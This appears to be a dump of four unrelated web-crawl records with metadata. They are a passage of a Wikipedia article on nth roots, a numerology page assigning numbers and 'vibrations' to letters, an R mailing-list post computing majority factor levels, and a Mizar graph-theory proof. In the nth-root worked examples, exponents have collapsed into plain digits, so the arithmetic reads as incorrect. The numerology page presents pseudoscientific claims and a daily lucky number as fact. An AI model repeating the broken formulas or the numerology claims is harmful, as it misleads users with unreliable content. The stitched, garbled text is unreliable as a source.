{A}{n}}\\,{\\frac {1}{x_{k}^{n-1}}}.$\n\nThis allows to have only one exponentiation, and to compute once for all the first factor of each term.\n\nFor example, to find the fifth root of 34, we plug in n = 5, A = 34 and x0 = 2 (initial guess). The first 5 iterations are, approximately:\nx0 = 2\nx1 = 2.025\nx2 = 2.02439 7...\nx3 = 2.02439 7458...\nx4 = 2.02439 74584 99885 04251 08172...\nx5 = 2.02439 74584 99885 04251 08172 45541 93741 91146 21701 07311 8...\n(All correct digits shown.)\n\nThe approximation x4 is accurate to 25 decimal places and x5 is good for 51.\n\nNewton's method can be modified to produce various generalized continued fraction for the nth root. For example,\n\n${\\sqrt[{n}]{z}}={\\sqrt[{n}]{x^{n}+y}}=x+{\\cfrac {y}{nx^{n-1}+{\\cfrac {(n-1)y}{2x+{\\cfrac {(n+1)y}{3nx^{n-1}+{\\cfrac {(2n-1)y}{2x+{\\cfrac {(2n+1)y}{5nx^{n-1}+{\\cfrac {(3n-1)y}{2x+\\ddots }}}}}}}}}}}}.$\n\n### Digit-by-digit calculation of principal roots of decimal (base 10) numbers\n\nPascal's Triangle showing $P(4,1)=4$ .\n\nBuilding on the digit-by-digit calculation of a square root, it can be seen that the formula used there, $x(20p+x)\\leq c$ , or $x^{2}+20xp\\leq c$ , follows a pattern involving Pascal's triangle. For the nth root of a number $P(n,i)$  is defined as the value of element $i$  in row $n$  of Pascal's Triangle such that $P(4,1)=4$ , we can rewrite the expression as $\\sum _{i=0}^{n-1}10^{i}P(n,i)p^{i}x^{n-i}$ . For convenience, call the result of this expression $y$ . Using this more general expression, any positive principal root can be computed, digit-by-digit, as follows.\n\nWrite the original number in decimal form. The numbers are written similar to the long division algorithm, and, as in long division, the root will be written on the line above. Now separate the digits into groups of digits equating to the root being taken, starting from the decimal point and going both left and right. The decimal point of the root will be above the decimal point of the radicand. One digit of the root will appear above each group of digits of the original number.\n\nBeginning with the left-most group of digits, do the following procedure for each group:\n\n1. Starting on the left, bring down the most significant (leftmost) group of digits not yet used (if all the digits have been used, write \"0\" the number of times required to make a group) and write them to the right of the remainder from the previous step (on the first step, there will be no remainder). In other words, multiply the remainder by $10^{n}$  and add the digits from the next group. This will be the current value c.\n2. Find p and x, as follows:\n• Let $p$  be the part of the root found so far, ignoring any decimal point. (For the first step, $p=0$ ).\n• Determine the greatest digit $x$  such that $y\\leq c$ .\n• Place the digit $x$  as the next digit of the root, i.e., above the group of digits you just brought down. Thus the next p will be the old p times 10 plus x.\n3. Subtract $y$  from $c$  to form a new remainder.\n4. If the remainder is zero and there are no more digits to bring down, then the algorithm has terminated. Otherwise go back to step 1 for another iteration.\n\n#### Examples\n\nFind the square root of 152.2756.\n\n 1 2. 3 4\n/\n\\/ 01 52.27 56\n\n 01 100·1·00·12 + 101·2·01·11 ≤ 1 < 100·1·00·22 + 101·2·01·21 x = 1\n01 y = 100·1·00·12 + 101·2·01·12 = 1 + 0 = 1\n00 52 100·1·10·22 + 101·2·11·21 ≤ 52 < 100·1·10·32 + 101·2·11·31 x = 2\n00 44 y = 100·1·10·22 + 101·2·11·21 = 4 + 40 = 44\n08 27 100·1·120·32 + 101·2·121·31 ≤ 827 < 100·1·120·42 + 101·2·121·41 x = 3\n07 29 y = 100·1·120·32 + 101·2·121·31 = 9 + 720 = 729\n98 56 100·1·1230·42 + 101·2·1231·41 ≤ 9856 < 100·1·1230·52 + 101·2·1231·51 x = 4\n98 56 y = 100·1·1230·42 + 101·2·1231·41 = 16 + 9840 = 9856\n00 00 Algorithm terminates: Answer is 12.34\n\n\nFind the cube root of 4192 to the nearest hundredth.\n\n 1 6. 1 2 4\n3 /\n\\/ 004 192.000 000 000\n\n 004 100·1·00·13 + 101·3·01·12 + 102·3·02·11 ≤ 4 < 100·1·00·23 + 101·3·01·22 + 102·3·02·21 x = 1\n001 y = 100·1·00·13 + 101·3·01·12 + 102·3·02·11 = 1 + 0 + 0 = 1\n003 192 100·1·10·63 + 101·3·11·62 + 102·3·12·61 ≤ 3192 < 100·1·10·73 + 101·3·11·72 + 102·3·12·71 x = 6\n003 096 y = 100·1·10·63 + 101·3·11·62 + 102·3·12·61 = 216 + 1,080 + 1,800 = 3,096\n096 000 100·1·160·13 + 101·3·161·12 + 102·3·162·11 ≤ 96000 < 100·1·160·23 + 101·3·161·22 + 102·3·162·21 x = 1\n077 281 y = 100·1·160·13 + 101·3·161·12 + 102·3·162·11 = 1 + 480 + 76,800 = 77,281\n018 719 000 100·1·1610·23 + 101·3·1611·22 + 102·3·1612·21 ≤ 18719000 < 100·1·1610·33 + 101·3·1611·32 + 102·3·1612·31 x = 2\n015 571 928 y = 100·1·1610·23 + 101·3·1611·22 + 102·3·1612·21 = 8 + 19,320 + 15,552,600 = 15,571,928\n003 147 072 000 100·1·16120·43 + 101·3·16121·42 + 102·3·16122·41 ≤ 3147072000 < 100·1·16120·53 + 101·3·16121·52 + 102·3·16122·51 x = 4\nThe desired precision is achieved:\nThe cube root of 4192 is about 16.12\n\n\n### Logarithmic calculation\n\nThe principal nth root of a positive number can be computed using logarithms. Starting from the equation that defines r as an nth root of x, namely $r^{n}=x,$  with x positive and therefore its principal root r also positive, one takes logarithms of both sides (any base of the logarithm will do) to obtain\n\n$n\\log _{b}r=\\log _{b}x\\quad \\quad {\\text{hence}}\\quad \\quad \\log _{b}r={\\frac {\\log _{b}x}{n}}.$\n\nThe root r is recovered from this by taking the antilog:\n\n$r=b^{{\\frac {1}{n}}\\log _{b}x}.$\n\n(Note: That formula shows b raised to the power of the result of the division, not b multiplied by the result of the division.)\n\nFor the case in which x is negative and n is odd, there is one real root r which is also negative. This can be found by first multiplying both sides of the defining equation by −1 to obtain $|r|^{n}=|x|,$  then proceeding as before to find |r|, and using r = −|r|.\n\n## Geometric constructibility\n\nThe ancient Greek mathematicians knew how to use compass and straightedge to construct a length equal to the square root of a given length, when an auxiliary line of unit length is given. In 1837 Pierre Wantzel proved that an nth root of a given length cannot be constructed if n is not a power of 2.\n\n## Complex roots\n\nEvery complex number other than 0 has n different nth roots.\n\n### Square roots\n\nThe two square roots of a complex number are always negatives of each other. For example, the square roots of −4 are 2i and −2i, and the square roots of i are\n\n${\\tfrac {1}{\\sqrt {2}}}(1+i)\\quad {\\text{and}}\\quad -{\\tfrac {1}{\\sqrt {2}}}(1+i).$\n\nIf we express a complex number in polar form, then the square root can be obtained by taking the square root of the radius and halving the angle:\n\n${\\sqrt {re^{i\\theta }}}=\\pm {\\sqrt {r}}\\cdot e^{i\\theta /2}.$\n\nA principal root of a complex number may be chosen in various ways, for example\n\n${\\sqrt {re^{i\\theta }}}={\\sqrt {r}}\\cdot e^{i\\theta /2}$\n\nwhich introduces a branch cut in the complex plane along the positive real axis with the condition 0 ≤ θ < 2π, or along the negative real axis with π < θ ≤ π.\n\nUsing the first(last) branch cut the principal square root ${\\sqrt {z}}$  maps $z$  to the half plane with non-negative imaginary(real) part. The last branch cut is presupposed in mathematical software like Matlab or Scilab.\n\n### Roots of unity\n\nThe number 1 has n different nth roots in the complex plane, namely\n\n$1,\\;\\omega ,\\;\\omega ^{2},\\;\\ldots ,\\;\\omega ^{n-1},$\n\nwhere\n\n$\\omega =e^{\\frac {2\\pi i}{n}}=\\cos \\left({\\frac {2\\pi }{n}}\\right)+i\\sin \\left({\\frac {2\\pi }{n}}\\right)$\n\nThese roots are evenly spaced around the unit circle in the complex plane, at angles which are multiples of $2\\pi /n$ . For example, the square roots of unity are 1 and −1, and the fourth roots of unity are 1, $i$ , −1, and $-i$ .\n\n### nth roots\n\nGeometric representation of the 2nd to 6th roots of a complex number z, in polar form re where r = |z | and φ = arg z. If z is real, φ = 0 or π. Principal roots are shown in black.\n\nEvery complex number has n different nth roots in the complex plane. These are\n\n$\\eta ,\\;\\eta \\omega ,\\;\\eta \\omega ^{2},\\;\\ldots ,\\;\\eta \\omega ^{n-1},$\n\nwhere η is a single nth root, and 1, ωω2, ... ωn−1 are the nth roots of unity. For example, the four different fourth roots of 2 are\n\n${\\sqrt[{4}]{2}},\\quad i{\\sqrt[{4}]{2}},\\quad -{\\sqrt[{4}]{2}},\\quad {\\text{and}}\\quad -i{\\sqrt[{4}]{2}}.$\n\nIn polar form, a single nth root may be found by the formula\n\n${\\sqrt[{n}]{re^{i\\theta }}}={\\sqrt[{n}]{r}}\\cdot e^{i\\theta /n}.$\n\nHere r is the magnitude (the modulus, also called the absolute value) of the number whose root is to be taken; if the number can be written as a+bi then $r={\\sqrt {a^{2}+b^{2}}}$ . Also, $\\theta$  is the angle formed as one pivots on the origin counterclockwise from the positive horizontal axis to a ray going from the origin to the number; it has the properties that $\\cos \\theta =a/r,$  $\\sin \\theta =b/r,$  and $\\tan \\theta =b/a.$\n\nThus finding nth roots in the complex plane can be segmented into two steps. First, the magnitude of all the nth roots is the nth root of the magnitude of the original number. Second, the angle between the positive horizontal axis and a ray from the origin to one of the nth roots is $\\theta /n$ , where $\\theta$  is the angle defined in the same way for the number whose root is being taken. Furthermore, all n of the nth roots are at equally spaced angles from each other.\n\nIf n is even, a complex number's nth roots, of which there are an even number, come in additive inverse pairs, so that if a number r1 is one of the nth roots then r2 = –r1 is another. This is because raising the latter's coefficient –1 to the nth power for even n yields 1: that is, (–r1)n = (–1)n × r1n = r1n.\n\nAs with square roots, the formula above does not define a continuous function over the entire complex plane, but instead has a branch cut at points where θ / n is discontinuous.\n\n## Solving polynomials\n\nIt was once conjectured that all polynomial equations could be solved algebraically (that is, that all roots of a polynomial could be expressed in terms of a finite number of radicals and elementary operations). However, while this is true for third degree polynomials (cubics) and fourth degree polynomials (quartics), the Abel–Ruffini theorem (1824) shows that this is not true in general when the degree is 5 or greater. For example, the solutions of the equation\n\n$x^{5}=x+1$\n\ncannot be expressed in terms of radicals. (cf. quintic equation)\n\n## Proof of irrationality for non-perfect nth power x\n\nAssume that ${\\sqrt[{n}]{x}}$  is rational. That is, it can be reduced to a fraction ${\\frac {a}{b}}$ , where a and b are integers without a common factor.\n\nThis means that $x={\\frac {a^{n}}{b^{n}}}$ .\n\nSince x is an integer, $a^{n}$ and $b^{n}$ must share a common factor if $b\\neq 1$ . This means that if $b\\neq 1$ , ${\\frac {a^{n}}{b^{n}}}$  is not in simplest form. Thus b should equal 1.\n\nSince $1^{n}=1$  and ${\\frac {n}{1}}=n$ , ${\\frac {a^{n}}{b^{n}}}=a^{n}$ .\n\nThis means that $x=a^{n}$  and thus, ${\\sqrt[{n}]{x}}=a$ . This implies that ${\\sqrt[{n}]{x}}$  is an integer. Since x is not a perfect nth power, this is impossible. Thus ${\\sqrt[{n}]{x}}$  is irrational." ]
[ null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c22cbcdc8f114887cf0ceeb723bb9624c6f132e2", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/0a087bedf56ce21d91007bc1ae516b3d792a0b09", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/d62b24be305beff66cba9bfbcc01a362ba390f44", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/7b3ba2638d05cd9ed8dafae7e34986399e48ea99", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/7b3ba2638d05cd9ed8dafae7e34986399e48ea99", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/b24cf97579cf40493908c64dc45971c781c97e78", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/46e5b5b462e546b1d3d7e5f9a23efece405b2e78", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/80f2473efed3bab9f7f5b72a631dd232be4b679f", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/93292ceaefa3fc23bbcffc9b19dbdbffe4efcffb", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/46e5b5b462e546b1d3d7e5f9a23efece405b2e78", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/11e64063ae461766db09ab330a3dc78add987ae6", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/b0c6b20525f408db495858a62f88ed231ef66dd5", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86969787,"math_prob":0.99976593,"size":18377,"snap":"2021-43-2021-49","text_gpt3_token_len":4942,"char_repetition_ratio":0.16518804,"word_repetition_ratio":0.026141826,"special_character_ratio":0.30119172,"punctuation_ratio":0.11257764,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999522,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,8,null,5,null,null,null,null,null,null,null,10,null,null,null,5,null,5,null,null,null,6,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-11-30T13:22:54Z\",\"WARC-Record-ID\":\"<urn:uuid:c931fbd5-dcdc-4259-a617-89ce5d502952>\",\"Content-Length\":\"272889\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cc36ec19-73c1-4fb8-a3a6-1a05662e5ef9>\",\"WARC-Concurrent-To\":\"<urn:uuid:25c47cc5-1db7-4415-95ba-15517d7c6ef7>\",\"WARC-IP-Address\":\"208.80.154.224\",\"WARC-Target-URI\":\"https://en.m.wikipedia.org/wiki/Nth_root\",\"WARC-Payload-Digest\":\"sha1:R5CSAHE7DEXQV5ROUU3JIH2AF4UTSKG3\",\"WARC-Block-Digest\":\"sha1:Y65IMJKNM2ZZMUKF43CLEVVWG4ZTU3OI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964358973.70_warc_CC-MAIN-20211130110936-20211130140936-00422.warc.gz\"}"}
http://www.first-names-meanings.com/letters-and-numbers.html
[ "", null, "# Correspondence between letters and numbers", null, "As with the first nine numbers, our alphabet is composed of twenty six letters. Each of these letters is definitively attached to a primary number by the principle of THEOSOPHICAL addition, and thereby appears the simplicity of the Pythagorean method.\n\nAny number can be reduced down to a primary number between 1 and 9 by the principle of theosophical addition. For example:\n\n10 becomes 1 + 0 = 1\n16 becomes 1 + 6 = 7\n29 becomes 2 + 9 = 11 which is then reduced to 1 + 1 = 2\n93 becomes 9 + 3 = 12 which is then reduced to 1 + 2 = 3\n1990 is reduced to 1 + 9 + 9 + 0 = 19 which becomes 1 + 9 = 10 and 10 = 1 + 0 = 1\n\nTherefore:\n\nA, the first letter of the alphabet has a value of pure 1\n\nB,  the second letter of the alphabet has a value of pure 2\n\nC,  the third letter of the alphabet has a value of pure 3\n\nD, the fourth letter of the alphabet has a value of pure 4\n\nE,  the fifth letter of the alphabet has a value of pure 5\n\nF,  the sixth letter of the alphabet has a value of pure 6\n\nG,  the seventh letter of the alphabet has a value of pure 7\n\nH, the eighth letter of the alphabet has a value of pure 8\n\nI, the ninth letter of the alphabet has a value of pure 9\n\nJ, the tenth letter of the alphabet, is already the beginning of the second octave of numbers and possesses the values of pure 1 (because 10 is reduced to 1+0=1), though amplified, at a higher vibration\n\nK, the eleventh letter of the alphabet, next in the second octave, carries the signification of the number 2 (because 11 is reduced to 1 + 1=2), but is particularly marked by the symbolism of the number 1, as it is repeated twice. Furthermore, in numerology the 11 is a master number which possesses elevated vibrations, which are attached to the signification of the letter K\n\nL, the twelfth letter of the alphabet carries the significations of the number 3 (because 12 becomes 1+2 = 3), and is marked by the numbers 1 and 2\n\nM, the thirteenth letter, carries the signification of the number 4 (because 13 becomes 1+3 = 4), and is marked by the influence of the 1 and 3\nN, the fourteenth letter, carries the signification of the number 5 (because 14 is reduced to 1+4 = 5), and is marked by the influence of the numbers 1 and 4\n\nO, the fifteenth letter, carries the signification of the number 6 (because 15 becomes 1+5 = 6), and is marked by the influence of the numbers 1 and 5\n\nP, the sixteenth letter, carries the signification of the number 7 (because 16 becomes 1+6 = 7), and is marked by the influence of the numbers 1 and 6\n\nQ, the seventeenth letter, carries the significations of the number 8 (because 17 is reduced to 1+7 = 8), and is marked by the influence of the numbers 1 and 7\n\nR, the eighteenth letter, carries the signification of the number 9 (because 18 is reduced to 1+8 = 9), and is marked by the numbers 1 and 8\n\nS, the nineteenth letter, carries the signification of the number 1 (because 19 becomes 1 + 9 = 10 = 1), and is marked by the numbers 1 and 9, and ends this second octave\n\nT, the twentieth letter, carries the signification of the number 2 (because 20 becomes 2 + 0 = 2), though amplified, an octave above\n\nU, the twenty-first letter, carries the signification of the number 3 (because 21 becomes 2+1=3), and is marked by the numbers 2 and 1\n\nV, the twenty-second letter, carries the signification of the number 4 (because 22 becomes 2 + 2 = 4), however, note that as the second master number of the scale, 22 possesses intense and elevated vibrations\nW, the twenty-third letter, carries the signification of the number 5 (because 23 becomes 2 + 3 = 5), and is marked by the numbers 2 and 3\n\nX, the twenty-fourth letter, carries the signification of the number 6 (because 24 becomes 2 + 4 = 6), and is marked by the numbers 2 and 4\n\nY, the twenty-fifth letter, carries the signification of the number 7 (because 25 is reduced to 2 5 = 7), and is marked by the numbers 2 and 5\nZ, the twenty-sixth letter, carries the signification of the number 8 (because 26 is reduced to 2 + 6 = 8), and is marked by the numbers 2 and 6.\n\nThis is a table to summarize the correspondence between the twenty-six letters of the alphabet and the first nine numbers. This is the basis of the Pythagorean method as well as the principle of theosophical addition which allows us to reduce any number down to one of the first nine numbers by adding the individual digits together.\n\n 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z\n\n## Life Path Number", null, "This is the reduced total of the date of birth, and therefore a fundamental and immutable element...it is what it is, fixed and definitive....", null, "Life Path Number\n\n## Day of Birth", null, "The study of the date of birth alone would constitute an entire volume. Many indications relating to one’s destiny...", null, "Day of Bitrh\n\n## Numbers, Master numbers", null, "Learn everything aboutThe symbolism of numbers and master numbers...", null, "Symbolism of numbers\n\n## The initial of the first name", null, "It is the first letter of the first name that has an immediate impact on others when we pronounce it....", null, "Initial of the first name\n\n## The karmic numbers", null, "The letters that make up our first name model us and provide structure. In a way, they represent our «departure baggage»...", null, "The karmic numbers\n\n## Letters and numbers", null, "As with the first nine numbers, our alphabet is composed of twenty six letters. Each of these letters is definitively attached to a primary number", null, "Letters and numbers\n\n## Names compatibility\n\nTest the compatibility of your names to know if your love relation is lucky to succeed. Friendship, love or passion?\nDiscover fast what waits for you...\n\nVerify now if your names are compatible!", null, "", null, "Thanks to the numerology, we propose you daily a horoscope personalized for your first name. Love, money , Shape: discover what waits for you for today. In Bonus every day find your daily lucky figure .. Horoscope of the first names\n\nHere is the horoscope of the first name : Aroa", null, "Couples: Trust in your partner, don't be so suspicious. Singles: The love of your life could manifest today, make sure you're ready!", null, "Remember, Short reckonings make long friends.", null, "You're in a great mood and feel on top of the world Aroa. You're self-confidence recieves a boost.", null, "Your Lucky number : 59" ]
[ null, "http://www.first-names-meanings.com/Images/sponsor.gif", null, "http://www.first-names-meanings.com/Images/lettres-et-nombres.jpg", null, "http://www.first-names-meanings.com/Images/chemin-de-vie.jpg", null, "http://www.first-names-meanings.com/Images/fleche_rouge.gif", null, "http://www.first-names-meanings.com/Images/jour-de-naissance.jpg", null, "http://www.first-names-meanings.com/Images/fleche_rouge.gif", null, "http://www.first-names-meanings.com/Images/symbolique-nombres.jpg", null, "http://www.first-names-meanings.com/Images/fleche_rouge.gif", null, "http://www.first-names-meanings.com/Images/initiale-prenom.jpg", null, "http://www.first-names-meanings.com/Images/fleche_rouge.gif", null, "http://www.first-names-meanings.com/Images/nombres-karmiques.jpg", null, "http://www.first-names-meanings.com/Images/fleche_rouge.gif", null, "http://www.first-names-meanings.com/Images/lettres-et-nombres.jpg", null, "http://www.first-names-meanings.com/Images/fleche_rouge.gif", null, "http://www.first-names-meanings.com/Images/sponsor.gif", null, "http://www.first-names-meanings.com/Images/horoscope-des-prenoms.jpg", null, "http://www.first-names-meanings.com/Images/horoscope-amour.jpg", null, "http://www.first-names-meanings.com/Images/horoscope-argent.jpg", null, "http://www.first-names-meanings.com/Images/horoscope-forme.jpg", null, "http://www.first-names-meanings.com/Images/horoscope-chiffre.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9293003,"math_prob":0.9882591,"size":6145,"snap":"2019-51-2020-05","text_gpt3_token_len":1631,"char_repetition_ratio":0.22439343,"word_repetition_ratio":0.21805792,"special_character_ratio":0.26948738,"punctuation_ratio":0.105672106,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.971308,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40],"im_url_duplicate_count":[null,4,null,4,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,null,null,4,null,null,null,4,null,2,null,1,null,2,null,1,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-23T18:23:12Z\",\"WARC-Record-ID\":\"<urn:uuid:971ebbf4-8620-4b6b-aad6-f2450ed208b3>\",\"Content-Length\":\"27768\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5fbc78ee-1110-47ab-a9df-c80f99d81d87>\",\"WARC-Concurrent-To\":\"<urn:uuid:d0005435-e82b-47d6-b778-d487709946c3>\",\"WARC-IP-Address\":\"185.18.82.122\",\"WARC-Target-URI\":\"http://www.first-names-meanings.com/letters-and-numbers.html\",\"WARC-Payload-Digest\":\"sha1:OHKKY5ZESUCOSNS6QZQCRCBWQTIP5RPG\",\"WARC-Block-Digest\":\"sha1:4RLKXDCTR35GDWSPIRO5SISZKX5BX5NY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250611127.53_warc_CC-MAIN-20200123160903-20200123185903-00225.warc.gz\"}"}
https://www.stat.math.ethz.ch/pipermail/r-help/2007-May/133119.html
[ "# [R] Aggregate to find majority level of a factor\n\nMike Lawrence Mike.Lawrence at DAL.CA\nThu May 31 22:43:25 CEST 2007\n\n```This should do the trick. Also labels ties with NA.\n\na=as.data.frame(cbind(c(1,1,1,2,2,2,3,3,3,4,4),c\n('big','big','small','big','small','small','small','small','small','big'\n,'small')))\na\\$V2=factor(a\\$V2)\n\nmaj=function(x){\ny=table(x)\nz=which.max(y)\nif(sum(y==max(y))==1){\nreturn(names(y)[z])\n}else{\nreturn(NA)\n}\n}\n\naggregate(a\\$V2,list(a\\$V1),maj)\n\nOn 31-May-07, at 4:25 PM, Thompson, Jonathan wrote:\n\n> I want to use the aggregate function to summarize data by a factor (my\n> field plots), but I want the summary to be the majority level of\n> another\n> factor.\n>\n>\n> For example, given the dataframe:\n>\n> Plot1 big\n> Plot1 big\n> Plot1 small\n> Plot2 big\n> Plot2 small\n> Plot2 small\n> Plot3 small\n> Plot3 small\n> Plot3 small\n>\n>\n> My desired result would be:\n> Plot1 big\n> Plot2 small\n> Plot3 small\n>\n>\n> I can't seem to find a scalar function that will give me the majority\n> level.\n>\n>\n> Jonathan Thompson\n>\n> ______________________________________________\n> R-help at stat.math.ethz.ch mailing list\n> https://stat.ethz.ch/mailman/listinfo/r-help\n> guide.html\n> and provide commented, minimal, self-contained, reproducible code.\n\n--\nMike Lawrence\nGraduate Student, Department of Psychology, Dalhousie University\n\nWebsite: http://myweb.dal.ca/mc973993\nPublic calendar: http://icalx.com/public/informavore/Public\n\n\"The road to wisdom? Well, it's plain and simple to express:\nErr and err and err again, but less and less and less.\"\n- Piet Hein\n\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.67185885,"math_prob":0.5568089,"size":1685,"snap":"2022-05-2022-21","text_gpt3_token_len":496,"char_repetition_ratio":0.15050565,"word_repetition_ratio":0.08368201,"special_character_ratio":0.3329377,"punctuation_ratio":0.2,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9806957,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-28T08:00:07Z\",\"WARC-Record-ID\":\"<urn:uuid:a570e3cd-6d8c-44ef-8666-352042fb28e4>\",\"Content-Length\":\"4909\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e85e382f-1cda-49a8-87a2-9a95a69f4a2d>\",\"WARC-Concurrent-To\":\"<urn:uuid:01bbbdde-4d64-4ca4-a471-f440e557838f>\",\"WARC-IP-Address\":\"129.132.119.195\",\"WARC-Target-URI\":\"https://www.stat.math.ethz.ch/pipermail/r-help/2007-May/133119.html\",\"WARC-Payload-Digest\":\"sha1:EDZLBXO7ACYJAGJNM5R7HLV6NJAA2QNT\",\"WARC-Block-Digest\":\"sha1:SG2Y2M32M2QXGE3QY6O7QFY2TXQ3MH7I\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652663013003.96_warc_CC-MAIN-20220528062047-20220528092047-00494.warc.gz\"}"}
http://mizar.org/version/current/html/proofs/glib_010/65
[ "let G1, G2 be _Graph; :: thesis: ex f, g being Function st\n( = [f,g] & dom f c= the_Vertices_of G1 & rng f c= the_Vertices_of G2 & dom g c= the_Edges_of G1 & rng g c= the_Edges_of G2 & ( for e being object st e in dom g holds\n( () . e in dom f & () . e in dom f ) ) & ( for e, v, w being object st e in dom g & v in dom f & w in dom f holds\n( e Joins v,w,G1 iff g . e Joins f . v,f . w,G2 ) ) & ( for e, v, w being object st e in dom g & v in dom f & w in dom f & e Joins v,w,G1 holds\ng . e Joins f . v,f . w,G2 ) )\n\nset f = the empty Function;\ntake the empty Function ; :: thesis: ex g being Function st\n( = [ the empty Function,g] & dom the empty Function c= the_Vertices_of G1 & rng the empty Function c= the_Vertices_of G2 & dom g c= the_Edges_of G1 & rng g c= the_Edges_of G2 & ( for e being object st e in dom g holds\n( () . e in dom the empty Function & () . e in dom the empty Function ) ) & ( for e, v, w being object st e in dom g & v in dom the empty Function & w in dom the empty Function holds\n( e Joins v,w,G1 iff g . e Joins the empty Function . v, the empty Function . w,G2 ) ) & ( for e, v, w being object st e in dom g & v in dom the empty Function & w in dom the empty Function & e Joins v,w,G1 holds\ng . e Joins the empty Function . v, the empty Function . w,G2 ) )\n\ntake the empty Function ; :: thesis: ( = [ the empty Function, the empty Function] & dom the empty Function c= the_Vertices_of G1 & rng the empty Function c= the_Vertices_of G2 & dom the empty Function c= the_Edges_of G1 & rng the empty Function c= the_Edges_of G2 & ( for e being object st e in dom the empty Function holds\n( () . e in dom the empty Function & () . e in dom the empty Function ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function holds\n( e Joins v,w,G1 iff the empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function & e Joins v,w,G1 holds\nthe empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) )\n\nthus [{},{}] = [ the empty Function, the empty Function] ; :: thesis: ( dom the empty Function c= the_Vertices_of G1 & rng the empty Function c= the_Vertices_of G2 & dom the empty Function c= the_Edges_of G1 & rng the empty Function c= the_Edges_of G2 & ( for e being object st e in dom the empty Function holds\n( () . e in dom the empty Function & () . e in dom the empty Function ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function holds\n( e Joins v,w,G1 iff the empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function & e Joins v,w,G1 holds\nthe empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) )\n\nthus ( dom the empty Function c= the_Vertices_of G1 & rng the empty Function c= the_Vertices_of G2 & dom the empty Function c= the_Edges_of G1 & rng the empty Function c= the_Edges_of G2 ) by XBOOLE_1:2; :: thesis: ( ( for e being object st e in dom the empty Function holds\n( () . e in dom the empty Function & () . e in dom the empty Function ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function holds\n( e Joins v,w,G1 iff the empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function & e Joins v,w,G1 holds\nthe empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) )\n\nthus ( ( for e being object st e in dom the empty Function holds\n( () . e in dom the empty Function & () . e in dom the empty Function ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function holds\n( e Joins v,w,G1 iff the empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) ) & ( for e, v, w being object st e in dom the empty Function & v in dom the empty Function & w in dom the empty Function & e Joins v,w,G1 holds\nthe empty Function . e Joins the empty Function . v, the empty Function . w,G2 ) ) ; :: thesis: verum" ]
[ null ]
